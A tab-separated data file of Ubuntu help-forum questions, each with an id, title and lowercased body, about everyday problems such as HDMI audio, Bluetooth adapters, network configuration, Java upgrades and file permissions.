466101	lubuntu 14.04 hdmi no sound on tv	i plugged in the hdmi-emphasized text cable from my tv and plugged it in my desktop and when i restarted the computer it has clear picture but no sound at all . i have looked for the solution but cant find the solution . i have downloaded and installed these and still donât have sound still alsa-hda-dkms_0.201204101019~maverick1_all.deb alsa-hda-dkms_0.201210261053~natty1_all.deb oem-audio-hda-daily-dkms_0.201405091731~ubuntu14.04.1_all.deb
466102	ubuntu 14.04 usb keyboard shift not working	i am using ubuntu 14.04 yesterday my shift key on my usb keyboard stopped working . the laptop shift key works fine . i have tried the following things to fix the issue but nothing works . restart laptop . tried other usb keyboard . moved usb to another port . tested usb keyboard on other machines and it works fine . can anyone give me something else to try .
466105	my desktop hangs and the monitor screen turns gray	i have been using ubuntu on my desktop for two years . if you could please help with these following questions : today the computer hung all of a sudden when i was using writer for scheduling . the screen turned dark gray and stopped there . it showed this message : a program is still running : /usr/lib/libreoffice/program/soffice is not responding . waiting for the program to finish . interrupting the program may cause you to lose work . the new window does not allow me to access to more than 2 files reading and using it at the same time to cut and paste . when i printed out using libreoffice calc or writer and pdf , the lines are faint and hard to read . when i printed out from my laptop using windows , the printed lines look ok. pdf printed out the whole printout turn back and most of the time the lines and document are faint and light . opening of the os takes longer than expected . thanks .
466107	using musique for your music	i just installed musique to my ubuntu 14.04 computer . is there a way to use it like itunes ? for example , i would love to add my own cover art and information so that the songs can be well organized . is there a way to do that ? any suggestion is appreciated .
466108	how do i turn off bluetooth on my t43 lubuntu 14.04	how do i turn off bluetooth , i can turn it on with bluetooth manager . i have looked online for a solution . all i get is install bluetooth manager but i donât need to install the manager , it is already installed . i just need to know how to turn it on and off . i have tried to find the solution most people are having the problem of no bluetooth manager installed . also i am using lubuntu 14.04 that was upgraded from 13.10 .
466109	change scrot output directory	when using scrot , i 'd like to have the files appear in ~/pictures/screenshots/ instead of in my home directory . scrot -e 'mv $ f ~/pictures/screenshots/' works ok , but i would love not to have to use the -e flag because i want to have the file output be in my screenshots folder every time . can i make scrot always output in ~/pictures/screenshots/ , so that scrot will just automagically dump the files in that directory ?
466111	error installing softwares	whenever i install any software/package , i get the following result . the software does get installed and works correctly but does this is not the supposed output . what is wrong with my system ? setting up extlinux ( 2:4.05+dfsg-2 ) ... p : checking for extlinux directory ... found . p : writing config for /boot/vmlinuz-3.5.0-49-generic ... p : writing config for /boot/vmlinuz-3.5.0-36-generic ... p : writing config for freedos on /dev/sda1 ... p : installing debian theme ... ln : failed to create symbolic link `/boot/extlinux/themes/debian ' : operation not permitted dpkg : error processing extlinux ( -- configure ) : subprocess installed post-installation script returned error exit status 1 setting up crossplatformui : i386 ( 1.0.27 ) ... rather than invoking init scripts through /etc/init.d , use the service ( 8 ) utility , e.g . service acpid restart since the script you are attempting to invoke has been converted to an upstart job , you may also use the stop ( 8 ) and then start ( 8 ) utilities , e.g . stop acpid ; start acpid . the restart ( 8 ) utility is also available . acpid stop/waiting acpid start/running , process 18879 package libqtgui4 exist qt_version = 4 make -c /lib/modules/3.5.0-49-generic/build m=/usr/local/bin/ztemtapp/zteusbserial/below2.6.27 modules make [ 1 ] : entering directory '/usr/src/linux-headers-3.5.0-49-generic' cc [ m ] /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.o /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:34:28 : fatal error : linux/smp_lock.h : no such file or directory compilation terminated . scripts/makefile.build:307 : recipe for target '/usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.o ' failed make [ 2 ] : *** [ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.o ] error 1 makefile:1207 : recipe for target '_module_/usr/local/bin/ztemtapp/zteusbserial/below2.6.27 ' failed make [ 1 ] : *** [ _module_/usr/local/bin/ztemtapp/zteusbserial/below2.6.27 ] error 2 make [ 1 ] : leaving directory '/usr/src/linux-headers-3.5.0-49-generic' makefile:18 : recipe for target 'modules ' failed make : *** [ modules ] error 2 dpkg : error processing crossplatformui : i386 ( -- configure ) : subprocess installed post-installation script returned error exit status 2 errors were encountered while processing : extlinux crossplatformui : i386 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) this occurs even while installing from the software center : and there is an error while sudo apt-get update about the unity-tweak-tool also . note : this error has become long after trying to install qt creator , earlier it was only about four-five lines and now its this long .
466114	i can not install ubuntu 14.04 lts on my pc !	i have windows 7 on my pc and i really wanted to install ubuntu 14.04 on my desktop so i downloaded it from the official ubuntu website ( www.ubuntu.com ) and i have 2 problems : 1 ) the file is only 300 mb large 2 ) when i open the iso image it opens roxio disk burner and tells me to burn the image into a disk what i did is that the i got it from another computer , put it on a pendrive and used the file to install ubuntu on the other computer as the other one does not have internet . so , please help me on this one . i am trying to install ubuntu on my friend 's pc and this is happening . thank you guys so much ! you'r all awesome : )
466115	qt audio engine not in ubuntu sdk	i am using ubuntu 14.04 . i installed ubuntu sdk with no problems using the instructions on ubuntu website . i created a new qml project . i want to create an app that uses qt audio engine . here is my code where i am testing for the audio engine : import qtquick 2.0 import ubuntu.components 0.1 import qtaudioengine 1.0 import `` ui '' mainview { // objectname for functional testing purposes ( autopilot-qt5 ) objectname : `` mainview '' // note ! applicationname needs to match the `` name '' field of the click manifest applicationname : `` com.ubuntu.developer..audioenginetest '' /* this property enables the application to change orientation when the device is rotated . the default is false . */ //automaticorientation : true width : units.gu ( 100 ) height : units.gu ( 75 ) audioengine { } tabs { id : tabs hellotab { objectname : `` hellotab '' } worldtab { objectname : `` worldtab '' } } } when i try to run the program , i am given an error : module `` qtaudioengine '' is not installed . the qt audio engine is in the current ubuntu qml api . why is it not in the sdk ? should i somehow install it myself or will it be added by the development team ?
466118	14.04 how to connect/mount galaxy s4	how can i connect to my galaxy s4 via usb ? when i connect it via usb all i get are errors saying unable to mount device .
466120	why do i need to restart networking or ubuntu after restarting my cisco switch	if a ubuntu server is communicating across a cisco switch or to a cisco switch when that switch is rebooted for some reason , that server is then unable to communicate with that vlan until networking service is restarted or in 14.04 the whole server needs restarting suse and centos do not have this issue , any help appreciated steve further information here http : //ubuntuforums.org/showthread.php ? t=2224167
466122	why i got 'unable to resolve host ' when i do 'sudo ' ?	whenever i do 'sudo ' i get an error saying 'sudo : unable to resolve host hp-pavilion ' . i recently change my hostname to `` hp-pavilion '' . i wonder if i screw up something . $ sudo mkdir sourcecodepro sudo : unable to resolve host hp-pavilion [ sudo ] password for mike : thank you for your help .
466123	hardwired ethernet not working but wireless is	i have 2 ethernet cards ( built into my motherboard ) and 1 wireless card ( assigned via dhcp as 192.168.1.67 by my att dsl modem/router ) on my linux box . wireless works fine . i tried using network manager to configure eth1 but when i entered the desired ip address and network mask ( 255.255.255.0 ) then clicked save , the setting would n't take . if i immediately typed `` ifconfig '' i would get this : eth0 link encap : ethernet hwaddr 00:04:4b:15:45:77 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) eth1 link encap : ethernet hwaddr 00:04:4b:15:45:78 up broadcast running multicast mtu:1500 metric:1 rx packets:501 errors:341 dropped:18 overruns:340 frame:1 tx packets:457 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:57297 ( 57.2 kb ) tx bytes:45203 ( 45.2 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:1119 errors:0 dropped:0 overruns:0 frame:0 tx packets:1119 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:105359 ( 105.3 kb ) tx bytes:105359 ( 105.3 kb ) wlan0 link encap : ethernet hwaddr 00 : c0 : ca:36:46:12 inet addr:192.168.1.67 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :2c0 : caff : fe36:4612/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:14035 errors:0 dropped:0 overruns:0 frame:0 tx packets:8356 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:14142088 ( 14.1 mb ) tx bytes:1208084 ( 1.2 mb ) it is obvious that eth1 was not configured even though i just configured it using the network manager tool . it 's as if i did n't do anything . so i searched the web looking for something ... something to enlighten me . i eventually found someone with a somewhat similar problem . so i started to follow what they did and here is some of what i did . dump of /etc/networkmanager.conf [ main ] plugins=ifupdown , keyfile , ofono dns=dnsmasq no-auto-default=00:04:4b:15:45:77 , [ ifupdown ] managed=true notice the `` managed = true . '' i changed that . it previously said , `` managed = false . '' i then went into the /etc/network/interfaces file and added the text starting at `` # the primary hard-wired network interface '' /ect/networks/interfaces # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) # the loopback interface auto lo iface lo inet loopback # the primary hard-wired network interface iface eth1 inet static address 192.168.1.4 netmask 255.255.255.0 gateway 192.168.1.254 then i save that and tried restarting network services . nothing changed so after changing that file i typed : ifconfig eth1 192.168.1.4 netmask 255.255.255.0 up i typed ifconfig and i could see the card was configured with the network address i wanted . things started to look promising but of course i would n't be typing this if i got it working . so i tried pinging the 192.168.1.4 address from another computer ( 192.168.1.6 ) on the same wired network , but if i tried the reverse by pinging that other computer ( 192.168.1.6 ) from 192.168.1.4 it would just hang there forever displaying : frequencydrive @ hacker : ~ $ ping 192.168.1.6 ping 192.168.1.6 ( 192.168.1.6 ) 56 ( 84 ) bytes of data . it would just hang there not responding to the ping . i also noticed that i could no longer surf the internet . if i tried going to google immediately after using the `` ifconfig eth1 192.168.1.4 ... '' command shown above i could not get anywhere using firefox . it seemed to lose it 's route to the default gateway ? if i brought down the interface by typing : sudo ifconfig eth1 down i could immediately surf the web . what the heck is causing all this ? i just want a wired network and a wireless network all on the same 192.168.1.x address space . some of the things i did i got from this thread : trying to configure eth0 and eth1 but failed to bring up eth1 i 've been working on this problem for days . it 's so frustrating . why does networking have to be so hard with linux ? thanks for any help .
466125	redirecting external ports to local ip	i have a ubuntu 13.10 server and a registered domain name . i have a web server on my 192.168.24.1 machine and a ftp server on my 192.168.24.2 . using iptables i want : 1 ) people who write : http : //mydomainname.com to be redirected to 192.168.24.1 2 ) people who want to use my ftp ( filezilla or something inputing mydomainname ) to be redirected to 192.168.24.2 thank you in advance for your answers !
466126	upgrade oracle java 7 to java 8 for ubuntu	this could be more of a guide than a question to anyone who upgrades oracle java version 7 to 8 . my server was running ubuntu 13.04 with java version 7 . my update to java version 8 was not successful because apt-get could not locate oracle-java8-installer . i have followed the instructions from http : //www.webupd8.org/2012/09/install-oracle-java-8-in-ubuntu-via-ppa.html to the dot but it did n't work for me , sudo add-apt-repository ppa : webupd8team/java sudo apt-get update sudo apt-get install oracle-java8-installer i realized the problem was because i had version 7 installed and my apt-get source list , /etc/apt/sources.list.d/webupd8team-java-raring.list , was pointing to raring distribution deb http : //ppa.launchpad.net/webupd8team/java/ubuntu raring main rather than trusty even though i upgraded . i manually changed to trusty deb http : //ppa.launchpad.net/webupd8team/java/ubuntu trusty main and apt-get gladly installed the java version 8 installer . my question is , what should i do to make apt-get modify the distribution to get the latest java installation ?
466127	wlan disconnects and asks for password repeatedly on 14.04	i upgraded to ubuntu 14.04 as soon as the stable version was released . i had no problems with wlan then , but yesterday my wifi-connector started losing connection . it also asks for the password repeatedly , accepting it each time , but forgetting it each time after disconnect . how do i troubleshoot what the problem is ? was there a recent package-upgrade that messed up the wlan drivers ? here 's my ifconfig : wlan0 link encap : ethernet hwaddr 00:0f:54:12:0d:6d inet addr:192.168.2.7 bcast:192.168.2.255 mask:255.255.255.0 inet6 addr : fe80 : :20f:54ff : fe12 : d6d/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:13084 errors:0 dropped:0 overruns:0 frame:0 tx packets:11115 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:15231321 ( 15.2 mb ) tx bytes:1479773 ( 1.4 mb ) and here is the result of iwconfig : wlan0 ieee 802.11bgn essid : '' xxxxxx '' mode : managed frequency:2.437 ghz access point : 94:44:52 : bb:49:83 bit rate=15 mb/s tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off power management : on link quality=29/70 signal level=-81 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:67 invalid misc:17 missed beacon:0 lsusb shows the wireless adapter i am using : bus 003 device 002 : id 148f:5370 ralink technology , corp. rt5370 wireless adapter i can reasonably certainly rule out router issues , since none of the other machines on the wlan have connection problems . deleting the access point and reconnecting does not seem to help .
466128	add folder shortcut to launcher	i have created a shortcut to /var/www folder in the name 'www ' to my desktop.is it possible to add/drag this folder shortcut to ubuntu launcher ? please help , thanks
466130	applications are not opening in normal user session	applications such as thunderbird , firefox , scheduled task are not starting in normal user session unless i have to open terminal and login as a root , after that i have to type thunderbird , then thunderbird will open . after opening from root it show following error : - please help . thanks
466131	reinstall ubuntu with lxde on current encrypted drive on dell xps 13 ( model 9333 , late 2013/early 2014 ) ?	i am a fairly new ubuntu user . my experience began about a month ago with stock ubuntu 14.04 on a new dell xps 13 laptop . since then i’ve fiddled around extensively , set up some things , broken ( and then patched others ) , discovered my hatred of unity and discovered lxde . my current ubuntu installation is on an encrypted drive ( not just the user partition ) and i wish to maintain this arrangement . ( meaning that i want an encrypted drive , not that i refuse to delete anything on the path to achieving it . ) i’ve tried booting lubuntu but many of the drivers necessary for my machine are absent , so i suppose that really isn’t an option because nobody helps me figure out how to locate and install the drivers for my system’s hardware . so… in the linux world , how does one go about deleting the contents of an encrypted volume and then reinstalling stock ubuntu on top of it , but avoiding the installation of unity in favour of lxde ?
466132	accidentally deleted etc/fstab	etc/fstab accidentally edited or deleted , i do n't know . please someone help me to solve this . i am new to ubuntu . general error mounting filesystem . a maintenance shell will now be started . control-d will terminate this shell and reboot the system more info : disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x0005a46f device boot start end blocks id system /dev/sda1 * 1 74697 599999489 5 extended partition 1 does not start on physical sector boundary . /dev/sda2 75195 100094 200000512 83 linux /dev/sda3 74697 75195 3999744 82 linux swap / solaris /dev/sda4 100094 121602 172761088 83 linux /dev/sda5 1 31124 249999360 83 linux /dev/sda6 31124 62248 249999360 83 linux /dev/sda7 62248 64738 19998720 83 linux /dev/sda8 64738 69717 39999488 83 linux /dev/sda9 69718 74573 38999040 83 linux /dev/sda10 74573 74697 998400 83 linux
466134	drivers for dell xps 13 ( model 9333 , late 2013/early 2014 ) driver pack ?	i’m currently running ubuntu 14.04 i’m looking to install lubuntu on my dell xps 13 . i’ve tried booting from the live-distro and love the look and feel of lxde , but unfortunately several hardware devices ( the trackpad , the webcam , and who knows what else ) do not really function correctly . i presume they’re lacking drivers . so before i embark upon the adventure of removing ubuntu and replacing it with lubuntu , i’d like to know where i can easily get a pack of drivers to install once i have done so . thanks .
466136	right package for json-glib development headers	during configuration of one project , i got the error : checking for json ... no no configure : error : you must have json-glib > = 0.14.0 development headers installed to build . make : *** [ config.status ] error 1 the configure script contains such strings : $ cat configure | grep json-glib { { $ as_echo `` $ as_me : $ { as_lineno- $ lineno } : \ $ pkg_config -- exists -- print-errors \ '' json-glib-1.0 > = 0.14.0\ '' '' ; } > & 5 ( $ pkg_config -- exists -- print-errors `` json-glib-1.0 > = 0.14.0 '' ) 2 > & 5 pkg_cv_json_cflags=` $ pkg_config -- cflags `` json-glib-1.0 > = 0.14.0 '' 2 > /dev/null` { { $ as_echo `` $ as_me : $ { as_lineno- $ lineno } : \ $ pkg_config -- exists -- print-errors \ '' json-glib-1.0 > = 0.14.0\ '' '' ; } > & 5 ( $ pkg_config -- exists -- print-errors `` json-glib-1.0 > = 0.14.0 '' ) 2 > & 5 pkg_cv_json_libs=` $ pkg_config -- libs `` json-glib-1.0 > = 0.14.0 '' 2 > /dev/null` json_pkg_errors=` $ pkg_config -- short-errors -- print-errors -- cflags -- libs `` json-glib-1.0 > = 0.14.0 '' 2 > & 1` json_pkg_errors=` $ pkg_config -- print-errors -- cflags -- libs `` json-glib-1.0 > = 0.14.0 '' 2 > & 1` so i assumed i need package json-glib-1.0 but it seems to be installed : $ apt-cache policy json-glib-1.0 libjson-glib-1.0-common : installed : 0.16.2-1ubuntu1 candidate : 0.16.2-1ubuntu1 version table : *** 0.16.2-1ubuntu1 0 500 http : //ru.archive.ubuntu.com/ubuntu/ trusty/main amd64 packages 100 /var/lib/dpkg/status libjson-glib-1.0-0-dbg : installed : ( none ) candidate : 0.16.2-1ubuntu1 version table : 0.16.2-1ubuntu1 0 500 http : //ru.archive.ubuntu.com/ubuntu/ trusty/main amd64 packages gir1.0-json-glib-1.0 : installed : ( none ) candidate : ( none ) version table : gir1.2-json-glib-1.0 : installed : ( none ) candidate : ( none ) version table : libjson-glib-1.0-0 : installed : 0.16.2-1ubuntu1 candidate : 0.16.2-1ubuntu1 version table : *** 0.16.2-1ubuntu1 0 500 http : //ru.archive.ubuntu.com/ubuntu/ trusty/main amd64 packages 100 /var/lib/dpkg/status does anyone know which package should i install ? in the case it does matter , the source is pidgin 3.0 development branch . everything i found in google is only a message about changing json-glib to 0.14 version . as raaz suggested below , i downloaded , converted and installed rpm via alien . but the configure script produces the same error , even with the newest version of package . $ dpkg -l json-glib-devel | grep include /usr/include /usr/include/json-glib-1.0 /usr/include/json-glib-1.0/json-glib /usr/include/json-glib-1.0/json-glib/json-gvariant.h /usr/include/json-glib-1.0/json-glib/json-builder.h /usr/include/json-glib-1.0/json-glib/json-gobject.h /usr/include/json-glib-1.0/json-glib/json-version.h /usr/include/json-glib-1.0/json-glib/json-parser.h /usr/include/json-glib-1.0/json-glib/json-reader.h /usr/include/json-glib-1.0/json-glib/json-path.h /usr/include/json-glib-1.0/json-glib/json-enum-types.h /usr/include/json-glib-1.0/json-glib/json-glib.h /usr/include/json-glib-1.0/json-glib/json-generator.h /usr/include/json-glib-1.0/json-glib/json-types.h
466141	the network speed of system monitor can not be shown in ubuntu 14.04	i found the speed value of network monitor in system monitor can not be shown after upgrade to ubuntu 14.04 . including indicator-multiload and dstat example 1 : i can see the download speed is 467kb/sec in firefox downloads , but nothing shows ( zero ) in network history example 2 : in the following image , git downloading speed is 358kb/sec , but the receive/send value in dstat is still 0 . and nothing shows in indicator-multiload i can get that , the network speed monitor is disabled somehow . how can i make it right ? some more information on my network interface ┌─ ( marslo @ mj ~ ) - > └─ $ ifconfig -a eth0 link encap : ethernet hwaddr 5c : f9 : dd:68:84:56 inet addr:192.168.1.103 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :5ef9 : ddff : fe68:8456/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:16 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:41285 errors:0 dropped:0 overruns:0 frame:0 tx packets:41285 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:456734429 ( 456.7 mb ) tx bytes:456734429 ( 456.7 mb ) wlan0 link encap : ethernet hwaddr 00 : c2 : c6:0a:14:05 broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) the information of pci ┌─ ( marslo @ marslojiao ~ ) - > └─ $ lspci | grep ethernet 08:00.0 ethernet controller : qualcomm atheros ar8161 gigabit ethernet ( rev 10 ) ┌─ ( marslo @ marslojiao ~ ) - > └─ $ lspci 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.2 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 3 ( rev c4 ) 00:1c.4 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 5 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm77 express chipset lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 01:00.0 3d controller : nvidia corporation gf117m [ geforce 610m/710m/820m / gt 620m/625m/630m/720m ] ( rev a1 ) 02:00.0 network controller : intel corporation centrino wireless-n 2230 ( rev c4 ) 03:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5229 pci express card reader ( rev 01 ) 08:00.0 ethernet controller : qualcomm atheros ar8161 gigabit ethernet ( rev 10 )
466143	blackberry , barry desktop , ubuntu 14 , opensync	i have a blackberry playbook . i downloaded barry desktop from software centre . i tried to use barry , but it is asking me for opensync library . i have looked all over the internet and have no idea how to get it . what i would like to do is backup my playbook , add music and videos and to add apps that i have developed . thanks
466144	14.04 - only able to download with bittorrent client , not able to find my wifi network	where to begin ... this past sunday i received a new modem/router from time warner cable , when i got home it was already set up by my roommate . my computer could connect and get online perfectly . the next night when i got home from work i could not find my wifi network with my laptop , my smartphone , my old smartphone , my tablet , my roommates tablet laptop and phone could all find the network and use the internet just fine . i could turn my phone into a hotspot and my laptop could connect and get online . my laptop can use ethernet fine , just not able to find my wifi . also i 'm not able to download anything unless using bittorrent , which was after i downloaded chrome and deluge . now i have a toshiba satellite e105-s1402 , running 14.04 , and in full disclosure i do n't have a clue where to start with this . what do you think ?
466145	wrong permission to /etc folder	i given wrong permission to the /etc folder wrongly chmod -r 777 /etc while i want to login as root it gives me error and gives the following output . how can i give the correct permission and fix this ? system13 @ motpl : ~ $ sudo su sudo : /etc/sudoers is mode 0777 , should be 0440 sudo : no valid sudoers sources found , quitting sudo : unable to initialize policy plugin system13 @ motpl : ~ $ su root password : su : authentication failure system13 @ motpl : ~ $
466154	mount volume only after booting up	i have configured glusterfs between two ubuntu servers and mounting the gluster volume under /var/www directory . since i am using only two servers , i had to install glusterfs-client in the same machine itself ( http : //gopukrish.wordpress.com/high-availability-load-balanced-wordpress-site/ ) . my primary objective was to get the two servers replicated . currently i am mounting the volume as below : mount -t glusterfs server1 : /datavol /var/www when i add the same entry in /etc/fstab , server wont come online since it ca n't detect such a volume at bootup . otherwise i should add the fstab entry with the server 2 . but in worst case ( both servers down ) , no server will come online after the restart as both the servers are using one another server 's volume . is there anyway to automatically mount the volume automatically after the server came up online ?
466156	executable files never open	i have file preferences set to 'ask how to execute the file ' , and the file has permission to run as a program . however , when i double-click on the file and click 'run ' , it does n't run ... it lags up my computer , but no matter how long i leave it , the screen stays the same and no other windows pop up . the file in question is firestorm ( a sl viewer ) that does n't need to be installed , as stated in the readme file ( `` the firestorm linux client can entirely run from the directory you have unpacked it into - no installation step is required. '' ) . this also happens when i try to run windows programs with wine ( not sure if that helps or not , but same issue ) . thanks
466158	ubuntu 14.04 bluetooth adapter not found	i have multi-booted ubuntu 14.04 alongside the pre-installed windows 8.1 on my uefi-enabled hp envy 15 notebook . my wlan card is a combo card , ralink3290 . the problem is that my wifi works just fine both in ubuntu and windows , but i can not get the bluetooth to work in ubuntu . i have no problem with the bluetooth in windows whatsoever . but in ubuntu , the bluetooth option in system settings always shows `` bluetoth adapter not found '' . the option to enable it is also greyed out . also , i can not enable it manually through my keyboard button . seems that something is wrong with the adapter drivers . being a newbie in linux environment , i am not sure where the problem lies . i have gone through other posts , but did not quite get the solution . i tried installing blueman and all , but did not work for me . i also installed the driver from mediatek , but during installing it , i got an error 2 response , which i am not sure why . could somebody please help me out ? thanks in advance .
466160	try to install ubuntu - md5 check sums different	so to start off , the reason i came to be in this predicament is because my desktop crashed . it was originally running windows 8.1 , which i 'm not too fond of . i did n't have the windows disk and because i 've heard such great things about linux in the past few years i decided to give it a shot . but too much avail my efforts have been in vein . i 've been working on this the past 2 days and i 've learned a lot but at this point i 'm exhausted and do n't know where to turn to . i 've tried to load ubuntu 14.04 onto this desktop multiple times . i 've downloaded multiple server copies from various sources , and even one desktop copy as well . i also tried downloading 13.10 . none of them work . each time i 've loaded the iso file onto my usb using both the pendrive and unetbootin programs . when using the pendrive program , it seemed to transfer however it showed many errors in files copied . when i used unetbootin i got as far as loading it onto the desktop and getting a message saying 'invalid or corrupt kernal image ' . i 've used the md5sum checks on every file and none of the have equaled the same sum . one last desperation try of loading it on ( 14.04 lts `` trusty tahr '' - release amd64 ( 20140416.2 ) ) , and my desktop recognizes it.the unetbootin screen comes up and i select default . i start to go through all the installation steps , ( however without being able to connect to the internet at this point ) . it gets stuck at the `` install the system '' step . i hope you can feel my pain by now cus i just want this to work so badly . i then go to `` check the cd-rom ( s ) integrity '' . integrity test failed `` the ./pool/main/l/linux/pcmcia-storage-modules-3.13.0-24-generic-di_3.13.0-24-46_amd64.udeb file failed the md % checksum verification . you cd-rom or this file may have been corrupted '' can anyone help with this please ! ? i do n't want to have to go back to windows 8 haha . does anyone have any advice on whether being able to hook up to the internet would allow me to repair those problems ? - probably not but i thought i 'd ask thanks in advance for the help .
466161	boot loader reinstallation	boot loader installation failed during installing ubunt 12.5 dual boot with window 8 , now i am trying to install boot loader from live cd it takes so much time why ?
466162	can my internet speed be higher than my hdd write speed ?	i have an old pc with 10/100 lan interface and hitachi hdd 164gb with ide interface . i connected 40mb internt line to this pc . when i am trying to watch live video stream from the internet i am having a lot of buffering . is it possible that my hdd write speed is slower than my internet speed and it cause a buffering ?
466164	bluetooth does n't work	why does bluetooth have to wait till i execute the command , sudo hciconfig hci0 reset to perform its duty ? : ) thank you for time in advance !
466165	bash login script with zenity for cifs mount	i am writing a mount script for windows share to run after login . i have done it with bash and zenity and it works , but now i need to make it better so if username field and password field are empty then return to input . example wusername=`zenity -- entry -- width=300 -- title= '' mount $ mountdir '' -- text= '' kasutajanimi : '' ` # if [ $ ? -ne 0 ] ; then # exit 1 # fi if [ -z `` $ wusername '' ] ; then zenity -- error -- title= '' viga kasutajanimes ! '' -- text= '' palun sisestage oma kasutajanimi '' # get the windows password wpassword=`zenity -- entry -- width=300 -- title= '' mount $ mountdir '' -- text= '' parool : '' -- hide-text` if [ $ ? -ne 0 ] ; then exit 1 fi so i want this script to trow user back to input if kasutajanimi aka username or parool aka password is empty . even if space is pressed . i have searched the all mighty google for it and i know i can do it with return somehow .
466166	`` your java version is out of date . '' on ubuntu 2014.04	with fully updated ubuntu 2014.04 , firefox tells me : your java version is out of date . how to update java ? typing java -version in a terminal tells me : java version `` 1.7.0_51 '' java ( tm ) se runtime environment ( build 1.7.0_51-b13 ) java hotspot ( tm ) 64-bit server vm ( build 24.51-b03 , mixed mode ) typing which java tells me /usr/bin/java .
466167	how to set the environmental variables in ubuntu to install lua ?	great day guys , i am trying to install the lua on ubuntu.inorder to set the environmental variables for lua how can i procede ? thanks in advance
466174	how do i find out if a configuration setting is running ?	i use a high-dpi monitor on my lenovo yoga2 laptop ( like a retina display ) so i have to change the overall font-scaling . there are many ways to set the text-scale-factor , for example dconf-editor , i used unity-tweak-util , but in the end they seem to set the values in the global configuration : $ gsettings list-recursively|grep text-scal org.gnome.desktop.interface text-scaling-factor 2.0 com.canonical.unity.interface text-scale-factor 2.0 this solves it ( for most programms ) and everything is in a readeable size . now the problem : when i boot my pc this setting seems to take its effect later than the desktop is booted , cause when i instantly open nautilus when the desktop is up , i still have it all in a tiny font . if i wait some 10 seconds more and start nautilus then , i have it scaled the right way . i checked right after boot-time , i opened a console and watched the output of gsettings list-recursively|grep text-scal - the setting is already on 2.0 , but everything is still tiny . how can i achieve one of these solutions ? change this behaviour and get the font scaled right from the start ? make the desktop wait for the setting to be active ? generate a warning that the scaling is not set jet ?
466179	login screen background problem	i installed variety on ubuntu 14.04 and customize login screen support option to set variety wallpaper set as login screen background . i copied my wallpaper directory into ~/pictures directory and set access permission as 777 to both directory and pictures . after that wallpaper showed up correctly on login screen and everything works well . after few days login screen did n't change according to the desktop wallpaper and it turned into ash color and when i open unity tweak tool 's login settings it looks like this . how do i reset these settings and solve this problem . thanks in advance .
466180	delete certain filetypes and empty folders within a folder and subfolders	i have a folder that is full of files and subdirectories . a lot of that is trash , but some of it i want to keep . therefore , i want to delete all files of a few certain types ( which are the files i do n't want or need ) and then delete all empty directories and subdirectories . these commands do not work at all - they do nothing : find . -name `` *.jpg '' -type f -delete find . -type d -empty -delete i 'd really appreciate any help at all !
466182	can not download needed version . ( mac )	i ca n't download the mac version of ubuntu , the normal 64-bit version downloads , but when i try to download the mac 64-bit version it comes up with a `` 404 not found '' message . how can i fix this ?
